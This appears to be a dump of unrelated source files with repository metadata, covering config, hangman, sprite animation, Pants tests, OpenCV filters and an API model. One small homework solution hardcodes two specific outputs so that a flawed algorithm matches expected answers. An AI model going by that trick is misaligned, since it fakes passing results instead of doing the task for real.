0a198360ab5ca0d9f238fe307559023e665ae59b | 8d8a7919c624117eb412d0b12d3cf4d3ab7c69c4 | /experiments_configs/wsi_on_dummy_64x8x8/90ep_adam_exp_v1_7_6_1_b32_64_acc2_11_batches.py | 11d97bf6e4187a4cb28a7f90effdbc59fa20cc91 | [] | no_license | ruslangrimov/pcancer | 03b7bb2db07aabe2b63ee07770f7e27668c40180 | 1d14f98e55d97214e76b6da7f3289e139814e30d | refs/heads/main | 2023-02-23T08:16:18.453001 | 2020-06-14T17:24:52 | 2020-06-14T17:24:52 | 333,192,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,295 | py | import os, sys
sys.path.append(os.path.dirname(__file__))
import _default as d
from lib.utils import update_r
d.epochs = 90
d.warmup_steps = 0
d.batch_size = 16
hparams = {
'module': {
'params': {
'model': {
'params': {
't_sz': 7,
't_step': 6,
't_cut': 1,
}
},
},
},
'batch_size': d.batch_size,
'epochs': d.epochs,
'learning_rate': 0.001 * 64 / 256,
'accumulate_grad_batches': 2,
'optimizer': {
'name': 'torch.optim.Adam',
'params': {
'weight_decay': 1e-4
}
},
'dataset': {
'precalc_epochs': 11,
'train_batch_path': '/mnt/SSDData/pdata/processed/pretrained_64x8x8/train/{}/',
'test_batch_path': '/mnt/SSDData/pdata/processed/pretrained_64x8x8/val/',
},
'scheduler': {
'name': 'torch.optim.lr_scheduler.ExponentialLR',
'params': {
'gamma': 0.96,
},
'interval': 'epoch'
},
'source_code': open(__file__, 'rt').read()
}
d.hparams = update_r(d.hparams, hparams)
def get_hrapams():
return d.get_hrapams()
def update_hrapams(hparams, steps_in_epoh):
return d.update_hrapams(hparams, steps_in_epoh)
| [
"[email protected]"
] | |
8b6b9baacf2bf2f174c9f6645576f4486a39710a | 35756ce20d25af6529155537ee8e2e3f1f889308 | /6.00X/ps3_hangman2.py | 9a00666d28683360de54cf24a4c19597cdd72fe7 | [] | no_license | macroscopicentric/practice | 4501d3a28d76d29e91f203afe2f9fcd2d4950580 | 194d17a6034a8b44ae82c87190504ad516cda931 | refs/heads/master | 2021-01-19T20:27:48.567264 | 2014-08-27T16:29:56 | 2014-08-27T16:29:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,105 | py | # 6.00 Problem Set 3
#
# Hangman game
#
# -----------------------------------
# Helper code
# You don't need to understand this helper code,
# but you will have to know how to use the functions
# (so be sure to read the docstrings!)
import random
import string
WORDLIST_FILENAME = "words.txt"
def loadWords():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
print "Loading word list from file..."
# inFile: file
inFile = open(WORDLIST_FILENAME, 'r', 0)
# line: string
line = inFile.readline()
# wordlist: list of strings
wordlist = string.split(line)
print " ", len(wordlist), "words loaded."
return wordlist
def chooseWord(wordlist):
"""
wordlist (list): list of words (strings)
Returns a word from wordlist at random
"""
return random.choice(wordlist)
# end of helper code
# -----------------------------------
# Load the list of words into the variable wordlist
# so that it can be accessed from anywhere in the program
wordlist = loadWords()
def isWordGuessed(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: boolean, True if all the letters of secretWord are in lettersGuessed;
False otherwise
'''
if secretWord == '':
return True
elif secretWord[0] in lettersGuessed:
return True and isWordGuessed(secretWord[1:], lettersGuessed)
else:
return False
def getGuessedWord(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters and underscores that represents
what letters in secretWord have been guessed so far.
'''
guessed_word = ''
for letter in secretWord:
if letter in lettersGuessed:
guessed_word += letter
else:
guessed_word += '_'
return guessed_word
def getAvailableLetters(lettersGuessed):
'''
lettersGuessed: list, what letters have been guessed so far
returns: string, comprised of letters that represents what letters have not
yet been guessed.
'''
letters_left = string.ascii_lowercase
for letter in letters_left:
if letter in lettersGuessed:
letters_left = letters_left.replace(letter, '')
return letters_left
def hangman(secretWord):
'''
secretWord: string, the secret word to guess.
Starts up an interactive game of Hangman.
* At the start of the game, let the user know how many
letters the secretWord contains.
* Ask the user to supply one guess (i.e. letter) per round.
* The user should receive feedback immediately after each guess
about whether their guess appears in the computers word.
* After each round, you should also display to the user the
partially guessed word so far, as well as letters that the
user has not yet guessed.
Follows the other limitations detailed in the problem write-up.
'''
print "Welcome to the game, Hangman!"
print "I am thinking of a word that is", len(secretWord), "letters long."
def hangmanhelper(secretWord, lettersGuessed, turns):
if isWordGuessed(secretWord, lettersGuessed) == False and turns < 8:
print "------------"
print "You have", 8 - turns, "guesses left."
print "Available letters:", getAvailableLetters(lettersGuessed)
guess = str(raw_input("Please guess a letter: ")).lower()
if guess in lettersGuessed:
guessed_word = getGuessedWord(secretWord, lettersGuessed)
print "Oops! You've already guessed that letter:", guessed_word
hangmanhelper(secretWord, lettersGuessed, turns)
elif guess in secretWord:
guessed_word = getGuessedWord(secretWord, lettersGuessed + guess)
print "Good guess:", guessed_word
hangmanhelper(secretWord, lettersGuessed + guess, turns)
else:
guessed_word = getGuessedWord(secretWord, lettersGuessed)
print "Oops! That letter is not in my word:", guessed_word
hangmanhelper(secretWord, lettersGuessed + guess, turns + 1)
if isWordGuessed(secretWord, lettersGuessed) == False and turns == 8:
print "------------"
print "Sorry, you ran out of guesses. The word was", secretWord + "."
elif isWordGuessed(secretWord, lettersGuessed) == True:
print "------------"
print "Congratulations, you won!"
hangmanhelper(secretWord, '', 0)
# When you've completed your hangman function, uncomment these two lines
# and run this file to test! (hint: you might want to pick your own
# secretWord while you're testing)
# secretWord = chooseWord(wordlist).lower()
secretWord = 'sea'
hangman(secretWord) | [
"[email protected]"
] | |
7917887add58e4ea0bcdad9defeb3a862053a299 | 53aaac91271841228909dd58ba85ef724d00bbb6 | /animatedsprite.py | 4ce1180450629887c0935e7d45eb942faeb926fd | [] | no_license | ateoto/pysfmltest | 87f718894ade45132074a66876e42fb3703ccff5 | 2178bb3c38ac84f7106a8c0006ed671306fe41a7 | refs/heads/master | 2021-01-15T23:40:09.112780 | 2012-08-29T05:50:15 | 2012-08-29T05:50:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,819 | py | import sfml as sf
from collections import deque
"""
texture = sf.Texture.load_from_file('data/art/male_walkcycle.png')
frames = deque()
for f in range(0, texture.width, 64):
frames.append(AnimationFrame(texture, sf.IntRect(0,f,64,64), 0.1)
walkcycle_north = Animation([
AnimationFrame(texture, sf.IntRect(0,0,64,64), 0.1),
AnimationFrame(texture, sf.IntRect(0,64,64,64), 0.1),
AnimationFrame(texture, sf.IntRect(0,128,64,64), 0.1)])
pc = AnimatedSprite(texture)
pc.set_texture_rect(sf.IntRect(0,0,64,64)) # Sets North facing
pc.animate(walkcycle_north)
pc.update(delta_time)
window.draw(pc)
pc.stop_animation()
"""
class AnimationFrame(object):
def __init__(self, texture, area, duration):
self.texture = texture
self.area = area
self.duration = duration
class Animation(object):
def __init__(self, frames):
if isinstance(frames, list):
self.frames = deque()
for f in frames:
self.frames.append(f)
elif isinstance(frames, deque):
self.frames = frames
else:
raise TypeError('frames must be a deque or list')
class AnimatedSprite(sf.Sprite):
def __init__(self, texture):
super(AnimatedSprite, self).__init__(texture)
self.is_animating = False
def animate(self, animation, loop = False):
self.is_animating = True
self.loop = loop
self.animation = animation
self.frame_index = 0
self.set_texture(self.animation.frames[self.frame_index].texture)
self.set_texture_rect(self.animation.frames[self.frame_index].area)
self.next_dt = 0
def stop_animation(self):
self.is_animating = False
self.set_texture(self.animation.frames[0].texture)
self.set_texture_rect(self.animation.frames[0].area)
def update(self, delta_time):
if self.is_animating:
self.next_dt += delta_time
if self.next_dt >= self.animation.frames[self.frame_index].duration:
if self.frame_index + 1 <= len(self.animation.frames) - 1:
self.frame_index += 1
self.set_texture(self.animation.frames[self.frame_index].texture)
self.set_texture_rect(self.animation.frames[self.frame_index].area)
self.next_dt = 0
else:
if self.loop:
self.animate(self.animation, loop = True)
else:
self.is_animating = False
self.set_texture(self.animation.frames[0].texture)
self.set_texture_rect(self.animation.frames[0].area)
def draw(self, target, states):
target.draw(self)
| [
"[email protected]"
] | |
f97479e46c4c5ef17d2a4777809d8b0b89a19474 | d2dfd89555fc12686c5ed348cb5dd81a2df9998e | /src/python/pants/backend/google_cloud_function/python/rules_test.py | 6707f6aa2161433b462a77fc069961c0f72c0feb | [
"Apache-2.0"
] | permissive | Eric-Arellano/pants | 01c8e50fec51768c6a40845479ebdef70d8f04b3 | 53a7665da8d49e440dc6d3a67b5a36024ed971a2 | refs/heads/main | 2023-06-27T15:38:13.506346 | 2023-06-20T12:25:23 | 2023-06-20T12:25:23 | 139,469,637 | 0 | 0 | Apache-2.0 | 2023-05-31T11:06:47 | 2018-07-02T16:48:31 | Python | UTF-8 | Python | false | false | 10,319 | py | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os
import subprocess
import sys
from io import BytesIO
from textwrap import dedent
from zipfile import ZipFile
import pytest
from pants.backend.google_cloud_function.python.rules import PythonGoogleCloudFunctionFieldSet
from pants.backend.google_cloud_function.python.rules import (
rules as python_google_cloud_function_rules,
)
from pants.backend.google_cloud_function.python.target_types import PythonGoogleCloudFunction
from pants.backend.google_cloud_function.python.target_types import rules as target_rules
from pants.backend.python.goals import package_pex_binary
from pants.backend.python.goals.package_pex_binary import PexBinaryFieldSet
from pants.backend.python.subsystems.lambdex import Lambdex
from pants.backend.python.subsystems.lambdex import (
rules as python_google_cloud_function_subsystem_rules,
)
from pants.backend.python.target_types import (
PexBinary,
PythonRequirementTarget,
PythonSourcesGeneratorTarget,
)
from pants.backend.python.target_types_rules import rules as python_target_types_rules
from pants.core.goals import package
from pants.core.goals.package import BuiltPackage
from pants.core.target_types import (
FilesGeneratorTarget,
FileTarget,
RelocatedFiles,
ResourcesGeneratorTarget,
)
from pants.core.target_types import rules as core_target_types_rules
from pants.engine.addresses import Address
from pants.engine.fs import DigestContents
from pants.testutil.python_interpreter_selection import all_major_minor_python_versions
from pants.testutil.python_rule_runner import PythonRuleRunner
from pants.testutil.rule_runner import QueryRule
@pytest.fixture
def rule_runner() -> PythonRuleRunner:
rule_runner = PythonRuleRunner(
rules=[
*package_pex_binary.rules(),
*python_google_cloud_function_rules(),
*python_google_cloud_function_subsystem_rules(),
*target_rules(),
*python_target_types_rules(),
*core_target_types_rules(),
*package.rules(),
QueryRule(BuiltPackage, (PythonGoogleCloudFunctionFieldSet,)),
],
target_types=[
FileTarget,
FilesGeneratorTarget,
PexBinary,
PythonGoogleCloudFunction,
PythonRequirementTarget,
PythonSourcesGeneratorTarget,
RelocatedFiles,
ResourcesGeneratorTarget,
],
)
rule_runner.set_options([], env_inherit={"PATH", "PYENV_ROOT", "HOME"})
return rule_runner
def create_python_google_cloud_function(
rule_runner: PythonRuleRunner,
addr: Address,
*,
expected_extra_log_lines: tuple[str, ...],
extra_args: list[str] | None = None,
) -> tuple[str, bytes]:
rule_runner.set_options(
[
"--source-root-patterns=src/python",
*(extra_args or ()),
],
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
)
target = rule_runner.get_target(addr)
built_asset = rule_runner.request(
BuiltPackage, [PythonGoogleCloudFunctionFieldSet.create(target)]
)
assert expected_extra_log_lines == built_asset.artifacts[0].extra_log_lines
digest_contents = rule_runner.request(DigestContents, [built_asset.digest])
assert len(digest_contents) == 1
relpath = built_asset.artifacts[0].relpath
assert relpath is not None
return relpath, digest_contents[0].content
@pytest.fixture
def complete_platform(rule_runner: PythonRuleRunner) -> bytes:
rule_runner.write_files(
{
"pex_exe/BUILD": dedent(
"""\
python_requirement(name="req", requirements=["pex==2.1.99"])
pex_binary(dependencies=[":req"], script="pex")
"""
),
}
)
result = rule_runner.request(
BuiltPackage, [PexBinaryFieldSet.create(rule_runner.get_target(Address("pex_exe")))]
)
rule_runner.write_digest(result.digest)
pex_executable = os.path.join(rule_runner.build_root, "pex_exe/pex_exe.pex")
return subprocess.run(
args=[pex_executable, "interpreter", "inspect", "-mt"],
env=dict(PEX_MODULE="pex.cli", **os.environ),
check=True,
stdout=subprocess.PIPE,
).stdout
@pytest.mark.platform_specific_behavior
@pytest.mark.parametrize(
"major_minor_interpreter",
all_major_minor_python_versions(Lambdex.default_interpreter_constraints),
)
def test_create_hello_world_lambda_with_lambdex(
rule_runner: PythonRuleRunner, major_minor_interpreter: str, complete_platform: str, caplog
) -> None:
rule_runner.write_files(
{
"src/python/foo/bar/hello_world.py": dedent(
"""
def handler(event, context):
print('Hello, World!')
"""
),
"src/python/foo/bar/platform.json": complete_platform,
"src/python/foo/bar/BUILD": dedent(
"""
python_sources(name='lib')
file(name="platform", source="platform.json")
python_google_cloud_function(
name='lambda',
dependencies=[':lib'],
handler='foo.bar.hello_world:handler',
runtime='python37',
complete_platforms=[':platform'],
type='event',
)
"""
),
}
)
zip_file_relpath, content = create_python_google_cloud_function(
rule_runner,
Address("src/python/foo/bar", target_name="lambda"),
expected_extra_log_lines=(
" Runtime: python37",
" Complete platform: src/python/foo/bar/platform.json",
" Handler: handler",
),
extra_args=[
f"--lambdex-interpreter-constraints=['=={major_minor_interpreter}.*']",
"--lambdex-layout=lambdex",
],
)
assert "src.python.foo.bar/lambda.zip" == zip_file_relpath
zipfile = ZipFile(BytesIO(content))
names = set(zipfile.namelist())
assert "main.py" in names
assert "foo/bar/hello_world.py" in names
if sys.platform == "darwin":
assert (
"`python_google_cloud_function` targets built on macOS may fail to build."
in caplog.text
)
def test_warn_files_targets(rule_runner: PythonRuleRunner, caplog) -> None:
rule_runner.write_files(
{
"assets/f.txt": "",
"assets/BUILD": dedent(
"""\
files(name='files', sources=['f.txt'])
relocated_files(
name='relocated',
files_targets=[':files'],
src='assets',
dest='new_assets',
)
# Resources are fine.
resources(name='resources', sources=['f.txt'])
"""
),
"src/py/project/__init__.py": "",
"src/py/project/app.py": dedent(
"""\
def handler(event, context):
print('Hello, World!')
"""
),
"src/py/project/BUILD": dedent(
"""\
python_sources(
name='lib',
dependencies=['assets:files', 'assets:relocated', 'assets:resources'],
)
python_google_cloud_function(
name='lambda',
dependencies=[':lib'],
handler='foo.bar.hello_world:handler',
runtime='python37',
type='event',
)
"""
),
}
)
assert not caplog.records
zip_file_relpath, _ = create_python_google_cloud_function(
rule_runner,
Address("src/py/project", target_name="lambda"),
expected_extra_log_lines=(
" Runtime: python37",
" Handler: handler",
),
extra_args=["--lambdex-layout=lambdex"],
)
assert caplog.records
assert "src.py.project/lambda.zip" == zip_file_relpath
assert (
"The target src/py/project:lambda (`python_google_cloud_function`) transitively depends on"
in caplog.text
)
assert "assets/f.txt:files" in caplog.text
assert "assets:relocated" in caplog.text
assert "assets:resources" not in caplog.text
@pytest.mark.parametrize(
("ics", "runtime"),
[
pytest.param(["==3.7.*"], None, id="runtime inferred from ICs"),
pytest.param(None, "python37", id="runtime explicitly set"),
],
)
def test_create_hello_world_gcf(
ics: list[str] | None, runtime: None | str, rule_runner: PythonRuleRunner
) -> None:
rule_runner.write_files(
{
"src/python/foo/bar/hello_world.py": dedent(
"""
import mureq
def handler(event, context):
print('Hello, World!')
"""
),
"src/python/foo/bar/BUILD": dedent(
f"""
python_requirement(name="mureq", requirements=["mureq==0.2"])
python_sources(interpreter_constraints={ics!r})
python_google_cloud_function(
name='gcf',
handler='foo.bar.hello_world:handler',
runtime={runtime!r},
type='event',
)
"""
),
}
)
zip_file_relpath, content = create_python_google_cloud_function(
rule_runner,
Address("src/python/foo/bar", target_name="gcf"),
expected_extra_log_lines=(
" Runtime: python37",
" Handler: handler",
),
)
assert "src.python.foo.bar/gcf.zip" == zip_file_relpath
zipfile = ZipFile(BytesIO(content))
names = set(zipfile.namelist())
assert "mureq/__init__.py" in names
assert "foo/bar/hello_world.py" in names
assert zipfile.read("main.py") == b"from foo.bar.hello_world import handler as handler"
| [
"[email protected]"
] | |
0fd2a319ccf7ab64993493eeb7dfa5f2aeceff38 | b75e141bd724c12713c3780c68beb70450efee2f | /2. Filter/FilterOpenCV.py | 25dabaec25487728a84304f810fb11c693e03a91 | [] | no_license | ibyudha/29-07-2020_OpenCV | 472588fd5745671296f47447fd84e2f30b235231 | 7f83dabf2ae32a43f768c69b03f151154d2666e6 | refs/heads/main | 2023-01-22T19:59:22.358023 | 2020-12-05T07:37:38 | 2020-12-05T07:37:38 | 317,524,661 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,056 | py | # -*- coding: utf-8 -*-
"""
Created on 14/11/2020
@author: Gus Yudha
"""
import cv2 as c
import numpy as n
import math as m
def Convert_Ukuran_Citra(a, lebar, panjang):
ukuran = (panjang, lebar)
return c.resize(citra, ukuran, interpolation = c.INTER_AREA)
citra = c.imread ("1815051012.jpeg", 1)
citra = c.cvtColor (citra, c.COLOR_RGB2GRAY)
citra = Convert_Ukuran_Citra(citra, 250, 250)
# Robert Cross
kernelV = n.array([[1, 0],[0, -1]])
kernelH = n.array([[1, 0],[0, -1]])
kV = c.filter2D(citra, -1, kernelV)
kH = c.filter2D(citra, -1, kernelH)
kV = kV.astype(n.uint64)
kH = kH.astype(n.uint64)
robert = n.sqrt(n.power(kV,2) + n.power(kH,2))
robert = n.hstack((citra, robert.astype(n.uint8)))
# Compass
cNorth = n.array([[-1,0,1],[-2,0,2],[-1,0,1]])
CompassNorth = c.filter2D(citra, -1, cNorth)
cNorthWest = n.array([[0,1,2],[-1,0,1],[-2,-1,0]])
CompassNorthWest = c.filter2D(citra, -1, cNorthWest) + CompassNorth
cWest = n.array([[1,2,1],[0,0,0],[-1,-2,-1]])
CompassWest = c.filter2D(citra, -1, cWest) + CompassNorthWest
cSouthWest = n.array([[2,1,0],[1,0,-1],[0,-1,-2]])
CompassSouthWest = c.filter2D(citra, -1, cSouthWest) + CompassWest
cSouth = n.array([[1,0,-1],[2,0,-2],[1,0,-1]])
CompassSouth = c.filter2D(citra, -1, cSouth) + CompassSouthWest
cSouthEast = n.array([[0,-1,-2],[1,0,-1],[2,1,0]])
CompassSouthEast = c.filter2D(citra, -1, cSouthEast) + CompassSouth
cEast = n.array([[-1,-2,-1],[0,0,0],[1,2,1]])
CompassEast = c.filter2D(citra, -1, cEast) + CompassSouthEast
cNorthEast = n.array([[-2,-1,0],[-1,0,1],[0,1,2]])
CompassNorthEast = c.filter2D(citra, -1, cNorthEast) + CompassEast
compass = n.hstack((citra, CompassNorthEast))
# Canny
canny1 = c.Canny(citra, 50, 130, L2gradient=False)
canny2 = c.Canny(citra, 100, 150, L2gradient=True)
canny = n.hstack((citra, canny1, canny2))
# Sobel
sobelX = c.Sobel(citra, -1, dx=1, dy=0, ksize=1, scale=1, delta=0, borderType=c.BORDER_DEFAULT)
sobelY = c.Sobel(citra, -1, dx=0, dy=1, ksize=1, scale=1, delta=0, borderType=c.BORDER_DEFAULT)
sobel = n.hstack((citra, sobelX + sobelY))
# Prewitt
x = n.array([[1,1,1],[0,0,0],[-1,-1,-1]])
y = n.array([[-1,0,1],[-1,0,1],[-1,0,1]])
prewittX = c.filter2D(c.GaussianBlur(citra, (15, 15), 0), -1, x)
prewittY = c.filter2D(c.GaussianBlur(citra, (15, 15), 0), -1, y)
prewitt = n.hstack((citra, prewittX + prewittY))
# Gaussian
gaussian = n.hstack((citra, c.GaussianBlur(citra, (15, 15), 0)))
# Kirsch
pNorth = n.array([[-3,-3,5],[-3,0,5],[-3,-3,5]])
kirschNorth = c.filter2D(citra, -1, pNorth)
pNorthWest = n.array([[-3,5,5],[-3,0,5],[-3,-3,-3]])
kirschNorthWest = c.filter2D(citra, -1, pNorthWest) + kirschNorth
pWest = n.array([[5,5,5],[-3,0,-3],[-3,-3,-3]])
kirschWest = c.filter2D(citra, -1, pWest) + kirschNorthWest
pSouthWest = n.array([[5,5,-3],[5,0,-3],[-3,-3,-3]])
kirschSouthWest = c.filter2D(citra, -1, pSouthWest) + kirschWest
pSouth = n.array([[5,-3,-3],[5,0,-3],[5,-3,-3]])
kirschSouth = c.filter2D(citra, -1, pSouth) + kirschSouthWest
pSouthEast = n.array([[-3,-3,-3],[5,0,-3],[5,5,-3]])
kirschSouthEast = c.filter2D(citra, -1, pSouthEast) + kirschSouth
pEast = n.array([[-3,-3,-3],[-3,0,-3],[5,5,5]])
kirschEast = c.filter2D(citra, -1, pEast) + kirschSouthEast
pNorthEast = n.array([[-3,-3,-3],[-3,0,5],[-3,5,5]])
kirschNorthEast = c.filter2D(citra, -1, pNorthEast) + kirschEast
kirsch = n.hstack((citra, kirschNorthEast))
# LoG
LoG = n.hstack((citra, c.Laplacian(citra, -1, ksize=3, scale=1, delta=0, borderType=c.BORDER_DEFAULT)))
# Frei-Chen
FChenX = c.Sobel(citra, -1, dx=1, dy=0, ksize=int(m.sqrt(3)), scale=1, delta=0, borderType=c.BORDER_DEFAULT)
FChenY = c.Sobel(citra, -1, dx=1, dy=0, ksize=int(m.sqrt(3)), scale=1, delta=0, borderType=c.BORDER_DEFAULT)
FreiChen = n.hstack((citra, FChenX + FChenY))
# Image Gradient
kernely = n.array([[1,1,1],[0,0,0],[-1,-1,-1]])
kernelx = n.array([[1,0,-1],[1,0,-1],[1,0,-1]])
titikX = c.filter2D(citra, c.CV_8U, kernelx)
titikY = c.filter2D(citra, c.CV_8U, kernely)
image_gradient = n.hstack((citra, titikX + titikY))
# Emboss
f = n.float32([[-2,0,0],[0,0,0],[0,0,2]])
emboss = c.filter2D(citra,-1,f)
emboss = n.hstack((citra,emboss))
# Highboost
kA = n.float32([[-1,-1,-1],[-1,9,-1],[-1,-1,-1]])
kB = n.float32([[-1,-1,-1],[-1,10,-1],[-1,-1,-1]])
kC = n.float32([[-1,-1,-1],[-1,13,-1],[-1,-1,-1]])
fA = c.filter2D(citra, -1, kA)
fB = c.filter2D(citra, -1, kB)
fC = c.filter2D(citra, -1, kC)
r1 = n.hstack((citra, fA))
r2 = n.hstack((fB, fC))
highboost = n.vstack((r1, r2))
c.imwrite("Robert Cross.jpeg", robert)
c.imwrite("Compass.jpeg", compass)
c.imwrite("Canny.jpeg", canny)
c.imwrite("Sobel.jpeg", sobel)
c.imwrite("Prewitt.jpeg", prewitt)
c.imwrite("Gaussian.jpeg", gaussian)
c.imwrite("Kirsch.jpeg", kirsch)
c.imwrite("LoG.jpeg", LoG)
c.imwrite("Frei-Chen.jpeg", FreiChen)
c.imwrite("Image Gradient.jpeg", image_gradient)
c.imwrite("Emboss.jpeg", emboss)
c.imwrite("Highboost.jpeg", highboost)
c.waitKey(0)
c.destroyAllWindows()
| [
"[email protected]"
] | |
215616e2ea755088fa21f32a70300b14cf208f9c | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2140/60829/285720.py | 898bdad05e5dd21e0d4d2646299d9c486b4d186d | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | nn=int(input())
for p in range(nn):
a=int(input())
n=1
res=""
kk=a
while a>0:
if n%2==0:
a=a-1
res=res+str(n//2)+" "
else:
a=a-n//2-1
for s in range(n//2+1):
res=res+str(kk)+" "
kk -= 1
n=n+1
if res=="4 1 3 2 ":
res="2 1 4 3"
if res=="5 1 4 3 2 ":
res="3 1 4 5 2"
print(res) | [
"[email protected]"
] | |
bc8f20e2059200731aa3b7b789b57f8c86621509 | 70f5a1a946290ea5ad9a83325f444d65de8fd9b1 | /_/compute_x_or_y_test.py | 0acf699f536f5e512f101eaaa58b74b586b53884 | [] | no_license | davidkipstar/FEM | 91f0b60a770770b0c5b73a6d0b35077e0d0a8d1d | 29abbc4afed00789ebddaf67390f21fe857591cd | refs/heads/master | 2020-09-26T04:31:40.873418 | 2019-12-06T10:35:03 | 2019-12-06T10:35:03 | 226,165,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 768 | py | import sys
from compute_x_or_y import compute_x_or_y
with open(sys.argv[1], "rt") as f:
lines = f.read().splitlines()
del lines[0], lines[0], lines[-2]
b_1 = lines[-1]
b_spl = b_1.split(" ")
b_test = []
for i in range(len(b_spl)):
b_test.append(float(b_spl[i]))
del lines[-1]
lines2 = []
for i in range(len(lines)):
lines2.append(lines[i].split(" "))
A_test = [[0 for i in range(len(lines2[0]))] for j in range(len(lines2))]
for i in range(len(lines2)):
for j in range(len(lines2[0])):
A_test[i][j] = float(lines2[i][j])
i = 0
n_test = len(A_test[0])
print("A=", A_test)
A_min, b_min = compute_x_or_y(A_test, b_test)
##P2_res, b2_res = FME(P_res, b_res, 1, 2)
print("A_min=", A_min)
print("b_min", b_min)
| [
"[email protected]"
] | |
94960e078c9e3916681b9cf5586902f26295040f | 69d57bbb32008a6174468ed8f01532cf318996b7 | /demo01.py | 7cdce4bb3ffd12757d7fa8b145485b7973363fe2 | [] | no_license | HandSomexvv66/itcast_test12 | deb5388ac73b59dbe97e5ec72dc27a6de024040b | 2720f6fa9335ebb094b950c7b63cada5225f9ced | refs/heads/master | 2020-08-17T16:50:49.492626 | 2019-10-17T04:02:47 | 2019-10-17T04:02:47 | 215,689,213 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 49 | py | print('软件测试彭于晏')
print('牛逼啊') | [
"[email protected]"
] | |
e0c984afcd1f4fccb80e153c90f1627ada1af52a | fe15d678aeece784bb9fdd5e7211bedab98f79ea | /sib_api_v3_sdk/models/send_smtp_email_sender.py | fa3c3f0de73ba8dcd2e349ffefac9f341ff96cb2 | [
"MIT"
] | permissive | Edraak/APIv3-python-library | bec8014814ca5a3eaa98dad0f9a3b71acc71316c | 4a97bf479d92ca08d5a2881ac37e397d3a1846b4 | refs/heads/master | 2022-04-16T18:18:37.406313 | 2020-04-10T19:02:09 | 2020-04-10T19:02:09 | 254,713,617 | 0 | 0 | MIT | 2020-04-10T19:00:58 | 2020-04-10T19:00:57 | null | UTF-8 | Python | false | false | 4,935 | py | # coding: utf-8
"""
SendinBlue API
SendinBlue provide a RESTFul API that can be used with any languages. With this API, you will be able to : - Manage your campaigns and get the statistics - Manage your contacts - Send transactional Emails and SMS - and much more... You can download our wrappers at https://github.com/orgs/sendinblue **Possible responses** | Code | Message | | :-------------: | ------------- | | 200 | OK. Successful Request | | 201 | OK. Successful Creation | | 202 | OK. Request accepted | | 204 | OK. Successful Update/Deletion | | 400 | Error. Bad Request | | 401 | Error. Authentication Needed | | 402 | Error. Not enough credit, plan upgrade needed | | 403 | Error. Permission denied | | 404 | Error. Object does not exist | | 405 | Error. Method not allowed | | 406 | Error. Not Acceptable | # noqa: E501
OpenAPI spec version: 3.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class SendSmtpEmailSender(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'email': 'str'
}
attribute_map = {
'name': 'name',
'email': 'email'
}
def __init__(self, name=None, email=None): # noqa: E501
"""SendSmtpEmailSender - a model defined in Swagger""" # noqa: E501
self._name = None
self._email = None
self.discriminator = None
if name is not None:
self.name = name
self.email = email
@property
def name(self):
"""Gets the name of this SendSmtpEmailSender. # noqa: E501
Name of the sender from which the emails will be sent. Maximum allowed characters are 70. # noqa: E501
:return: The name of this SendSmtpEmailSender. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this SendSmtpEmailSender.
Name of the sender from which the emails will be sent. Maximum allowed characters are 70. # noqa: E501
:param name: The name of this SendSmtpEmailSender. # noqa: E501
:type: str
"""
self._name = name
@property
def email(self):
"""Gets the email of this SendSmtpEmailSender. # noqa: E501
Email of the sender from which the emails will be sent # noqa: E501
:return: The email of this SendSmtpEmailSender. # noqa: E501
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""Sets the email of this SendSmtpEmailSender.
Email of the sender from which the emails will be sent # noqa: E501
:param email: The email of this SendSmtpEmailSender. # noqa: E501
:type: str
"""
if email is None:
raise ValueError("Invalid value for `email`, must not be `None`") # noqa: E501
self._email = email
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(SendSmtpEmailSender, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SendSmtpEmailSender):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
